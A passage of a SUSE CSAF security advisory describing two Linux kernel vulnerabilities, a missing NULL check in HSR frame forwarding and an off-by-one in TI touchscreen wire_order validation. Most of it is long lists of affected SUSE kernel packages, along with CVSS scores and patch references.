net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 [inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68776",
"url": "https://www.suse.com/security/cve/CVE-2025-68776"
},
{
"category": "external",
"summary": "SUSE Bug 1256659 for CVE-2025-68776",
"url": "https://bugzilla.suse.com/1256659"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68777",
